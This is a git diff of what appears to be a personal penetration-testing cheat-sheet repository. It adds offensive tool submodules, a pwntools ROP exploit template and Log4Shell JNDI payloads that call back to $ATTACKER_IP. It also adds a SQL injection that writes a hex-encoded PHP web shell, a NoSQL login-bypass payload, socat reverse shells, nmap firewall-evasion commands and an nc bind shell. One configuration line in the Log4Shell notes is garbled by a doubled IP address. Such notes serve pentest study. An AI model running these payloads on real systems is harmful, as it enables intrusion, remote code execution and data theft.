diff --git a/.gitmodules b/.gitmodules index 4d93632..51ef318 100644 --- a/.gitmodules +++ b/.gitmodules @@ -109,3 +109,27 @@ [submodule "exploit/windows/PrintNightmare"] path = exploit/windows/PrintNightmare url = https://github.com/ly4k/PrintNightmare.git +[submodule "enumeration/containers/deepce"] + path = enumeration/containers/deepce + url = https://github.com/stealthcopter/deepce.git +[submodule "enumeration/Typo3Scan"] + path = enumeration/Typo3Scan + url = https://github.com/whoot/Typo3Scan.git +[submodule "exploit/web/php/phpggc"] + path = exploit/web/php/phpggc + url = https://github.com/ambionics/phpggc.git +[submodule "post_exploitation/priv_esc/sucrack"] + path = post_exploitation/priv_esc/sucrack + url = https://github.com/hemp3l/sucrack.git +[submodule "exploit/java/JNDI-Exploit-Kit"] + path = exploit/java/JNDI-Exploit-Kit + url = https://github.com/pimps/JNDI-Exploit-Kit.git +[submodule "exploit/binaries/buffer_overflow/ropstar"] + path = exploit/binaries/buffer_overflow/ropstar + url = https://github.com/xct/ropstar.git +[submodule "exploit/java/log4j-scan"] + path = exploit/java/log4j-scan + url = https://github.com/fullhunt/log4j-scan.git +[submodule "misc/static-binaries"] + path = misc/static-binaries + url = https://github.com/andrew-d/static-binaries.git diff --git a/enumeration/Typo3Scan b/enumeration/Typo3Scan new file mode 160000 index 0000000..9ee2b90 --- /dev/null +++ b/enumeration/Typo3Scan @@ -0,0 +1 @@ +Subproject commit 9ee2b90114121ecd95ffc943a81aa1d01c054a2f diff --git a/enumeration/containers/deepce b/enumeration/containers/deepce new file mode 160000 index 0000000..0605062 --- /dev/null +++ b/enumeration/containers/deepce @@ -0,0 +1 @@ +Subproject commit 060506279e6a0a5127da7245e9dac58c76d64fb4 diff --git a/exploit/buffer_overflow/bad_chars.py b/exploit/binaries/buffer_overflow/bad_chars.py similarity index 100% rename from exploit/buffer_overflow/bad_chars.py rename to exploit/binaries/buffer_overflow/bad_chars.py diff --git a/exploit/buffer_overflow/brainstorm.py b/exploit/binaries/buffer_overflow/brainstorm.py similarity index 100% rename from exploit/buffer_overflow/brainstorm.py rename to exploit/binaries/buffer_overflow/brainstorm.py diff --git a/exploit/buffer_overflow/buffer_overflow.py b/exploit/binaries/buffer_overflow/buffer_overflow.py similarity index 100% rename from exploit/buffer_overflow/buffer_overflow.py rename to exploit/binaries/buffer_overflow/buffer_overflow.py diff --git a/exploit/buffer_overflow/docs/amd64.md b/exploit/binaries/buffer_overflow/docs/amd64.md similarity index 100% rename from exploit/buffer_overflow/docs/amd64.md rename to exploit/binaries/buffer_overflow/docs/amd64.md diff --git a/exploit/buffer_overflow/docs/amd64_instructions.md b/exploit/binaries/buffer_overflow/docs/amd64_instructions.md similarity index 100% rename from exploit/buffer_overflow/docs/amd64_instructions.md rename to exploit/binaries/buffer_overflow/docs/amd64_instructions.md diff --git a/exploit/buffer_overflow/docs/buffer_overflow.md b/exploit/binaries/buffer_overflow/docs/buffer_overflow.md similarity index 100% rename from exploit/buffer_overflow/docs/buffer_overflow.md rename to exploit/binaries/buffer_overflow/docs/buffer_overflow.md diff --git a/exploit/buffer_overflow/docs/cut_stack_in_half.md b/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md similarity index 100% rename from exploit/buffer_overflow/docs/cut_stack_in_half.md rename to exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md diff --git a/exploit/buffer_overflow/docs/pwntools_specifics.md b/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md similarity index 100% rename from exploit/buffer_overflow/docs/pwntools_specifics.md rename to exploit/binaries/buffer_overflow/docs/pwntools_specifics.md diff --git a/exploit/buffer_overflow/docs/ret_address_reuse.md b/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md similarity index 100% rename from exploit/buffer_overflow/docs/ret_address_reuse.md rename to exploit/binaries/buffer_overflow/docs/ret_address_reuse.md diff --git a/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as similarity index 100% rename from exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as rename to exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as diff --git a/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as similarity index 100% rename from exploit/buffer_overflow/docs/shellcodes/setuid_shell.as rename to exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as diff --git a/exploit/buffer_overflow/fuzzer.py b/exploit/binaries/buffer_overflow/fuzzer.py similarity index 100% rename from exploit/buffer_overflow/fuzzer.py rename to exploit/binaries/buffer_overflow/fuzzer.py diff --git a/exploit/buffer_overflow/fuzzer2.py b/exploit/binaries/buffer_overflow/fuzzer2.py similarity index 100% rename from exploit/buffer_overflow/fuzzer2.py rename to exploit/binaries/buffer_overflow/fuzzer2.py diff --git a/exploit/buffer_overflow/fuzzer_BO.py b/exploit/binaries/buffer_overflow/fuzzer_BO.py similarity index 100% rename from exploit/buffer_overflow/fuzzer_BO.py rename to exploit/binaries/buffer_overflow/fuzzer_BO.py diff --git a/exploit/buffer_overflow/pwn_fuzz.py b/exploit/binaries/buffer_overflow/pwn_fuzz.py similarity index 100% rename from exploit/buffer_overflow/pwn_fuzz.py rename to exploit/binaries/buffer_overflow/pwn_fuzz.py diff --git a/exploit/binaries/buffer_overflow/ropping.md b/exploit/binaries/buffer_overflow/ropping.md new file mode 100644 index 0000000..8abd17c --- /dev/null +++ b/exploit/binaries/buffer_overflow/ropping.md @@ -0,0 +1,28 @@ +# ROP Chaining + +## Usage + +* Find cyclic buffer size +* Find gadgets via `ropper` or even better `ropstar` + +## Example +```python +from pwn import * + +s = ssh(host="$TARGET_IP", user="", keyfile="", password="") +p = s.process(['sudo', '']) + +offset= + +# take the ropchain from ropstar +payload = cyclic(offset) +payload += p64(0x4711) +payload += p64(0x235) +payload += p64(0x007) + +print(p.recv()) +p.sendline(payload) +print(p.recv()) +p.sendline("/bin/sh") +p.interactive(prompt='') +``` diff --git a/exploit/binaries/buffer_overflow/ropstar b/exploit/binaries/buffer_overflow/ropstar new file mode 160000 index 0000000..f025a2e --- /dev/null +++ b/exploit/binaries/buffer_overflow/ropstar @@ -0,0 +1 @@ +Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e diff --git a/exploit/buffer_overflow/peda b/exploit/buffer_overflow/peda deleted file mode 160000 index 84d38bd..0000000 --- a/exploit/buffer_overflow/peda +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43 diff --git a/exploit/java/JNDI-Exploit-Kit b/exploit/java/JNDI-Exploit-Kit new file mode 160000 index 0000000..e464fac --- /dev/null +++ b/exploit/java/JNDI-Exploit-Kit @@ -0,0 +1 @@ +Subproject commit e464facbc761a1b3530181a6f37c95925c197551 diff --git a/exploit/java/log4j-scan b/exploit/java/log4j-scan new file mode 160000 index 0000000..ceae24f --- /dev/null +++ b/exploit/java/log4j-scan @@ -0,0 +1 @@ +Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md index 65b8e98..87f8e99 100644 --- a/exploit/java/log4shell.md +++ b/exploit/java/log4shell.md @@ -25,6 +25,8 @@ curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449 * Use HTTP header field as storage for payload or any other possible input field ```HTTP X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo} +Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo} +X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo} ``` ## Usage @@ -87,4 +89,5 @@ ${${::-j}ndi:rmi://attackerendpoint.com/} * Add the following line to `solr.in.sh` ```toml SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" +10.10.90.21210.10.90.212 ``` diff --git a/exploit/sqli/no_sqli.md b/exploit/sqli/no_sqli.md index 9245473..b75f00f 100644 --- a/exploit/sqli/no_sqli.md +++ b/exploit/sqli/no_sqli.md @@ -32,3 +32,7 @@ $regex ```sh username=admin&password[$ne]=admin ``` +* JSON +```json +{"username":"user","password":{"$ne":""} } +``` diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index ac93307..f242e38 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md @@ -121,6 +121,12 @@ id=(SELECT banner FROM v$version) # oracle 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- - ``` +## Insert +* Insert file through insertion of `system()` or `exec_shell()` and a get parameter +```sql +'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- - +``` + ### Examples * sqli inside HTTP request to an API. Five values inside select have been discovered before ```HTTP diff --git a/exploit/web/http_header_injection.md b/exploit/web/http_header_injection.md new file mode 100644 index 0000000..9ff30aa --- /dev/null +++ b/exploit/web/http_header_injection.md @@ -0,0 +1,8 @@ +# HTTP Header Injection & Cache Poisoning + +## References + +* [Portswigger]https://portswigger.net/web-security/host-header +* [Spring project](https://github.com/spring-projects/spring-security/issues/4310) +* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html) + diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool index eb411ea..aa496cf 160000 --- a/exploit/web/jwt/jwt_tool +++ b/exploit/web/jwt/jwt_tool @@ -1 +1 @@ -Subproject commit eb411ea89b11df4485733201860619883a4f05e6 +Subproject commit aa496cf0e2f832318afd043e4baac6cef0502689 diff --git a/exploit/web/php/phpggc b/exploit/web/php/phpggc new file mode 160000 index 0000000..9121c3f --- /dev/null +++ b/exploit/web/php/phpggc @@ -0,0 +1 @@ +Subproject commit 9121c3f2c95b9b7726f663a1f2ce6526be69c713 diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md index a8889f9..f1cc794 100644 --- a/misc/level3_hypervisor/docker_sec/docker.md +++ b/misc/level3_hypervisor/docker_sec/docker.md @@ -63,7 +63,6 @@ or docker run -v /:/host --rm -it chroot /host/ bash ``` - ## Shared Namespaces * Namespaces * Cgroups @@ -106,6 +105,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" mkdir /mnt/hostdev mount /dev/ /mnt/hostdev ``` +* Check `/dev` as well !!! and mount device ## Creating a Container from inside another container diff --git a/post_exploitation/priv_esc/sucrack b/post_exploitation/priv_esc/sucrack new file mode 160000 index 0000000..c738b9a --- /dev/null +++ b/post_exploitation/priv_esc/sucrack @@ -0,0 +1 @@ +Subproject commit c738b9a6d78b6aa517767d7621480a3f3dfb4dd6 diff --git a/reverse_shells/docs/socat.md b/reverse_shells/docs/socat.md index 8ead11a..107a651 100644 --- a/reverse_shells/docs/socat.md +++ b/reverse_shells/docs/socat.md @@ -6,14 +6,19 @@ ```socat TCP-L: file:`tty`,raw,echo=0``` ### windows target -```socat TCP:: EXEC:powershell.exe,pipes``` +```sh +socat TCP:: EXEC:powershell.exe,pipes +``` ### linux target -```socat TCP:: EXEC:"bash -li"``` +```sh +socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane +``` ## Bind Shell ### generic connect ```socat TCP:: -``` + ### windows target listener ```socat TCP-L: EXEC:powershell.exe,pipes``` diff --git a/reverse_shells/firewalls.md b/reverse_shells/firewalls.md index e797763..72085cc 100644 --- a/reverse_shells/firewalls.md +++ b/reverse_shells/firewalls.md @@ -1,11 +1,99 @@ # Firewall Handling -# Windows +## Types + +* Packet filtering +* Circuit level gateway +* Stateful inspection +* Proxy +* Next generation firewall +* Cloud firewall and FWaaS + +## Rules + +### Windows ```sh netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869 ``` -# CentOS +### CentOS ```sh firewall-cmd --zone=public --add-port=57869/tcp ``` + +## Circumvention + +* IP/MAC/Port spoofing +* Fragmentation, MTU, data length +* Header modification + +### nmap + +#### Spoofing +* __Decoy__ `-D` , mixin real IP address with random adresses. Every port will be requested by any of these addresses. +```sh +sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP +sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP +``` +* __Proxy__ +```sh +sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP +``` +* __Spoofed MAC__ +```sh +sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP +``` +* __Spoofed IP__ +```sh +sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP +``` +* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44 +```sh +sudo nmap -F --source-port 443 $TARGET_IP +``` +* __Fragmentation__, eth header + 20 bytes header size + bytes fragments via `-f`, or 16 bytes via `-ff` +```sh +sudo nmap -Pn -F -f $TARGET_IP +``` +* __MTU__, works like fragmentation, `-f` == `--mtu 8` + +```sh +sudo nmap -Pn -F --mtu 8 +``` +* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes +```sh +sudo nmap -Pn -F --data-length 64 $TARGET_IP +``` + +#### Header Fields + +* __TTL__ +```sh +sudo nmap -Pn -F --ttl 64 $TARGET_IP +``` +* __IP OPTIONS__, `--ip-options` recordsas hex String + + * Route, `R` + * Timestamp, `T` + * Route + Timestamp, `U` + * Loose source routing, `L $IP $IP $IP` + * Strict source routing, `S $IP $IP $IP` + +* __Checksum__, craft bad checksum via `--badsum` to check errors +```sh +sudo nmap -Pn -F --badsum $TARGET_IP +``` + +#### After the FW +* __Hopping__, listen via netcat to catch that port +* __Tunneling__, relay open after passsing the firewall to connect to the closed port +```sh +nc -lvnp 443 --sh-exec "nc $TARGET_IP 25" +``` +* __Non standard ports__, open bin shell via +```sh +nc -lvnp 8888 -e /bin/bash +``` +and connect + +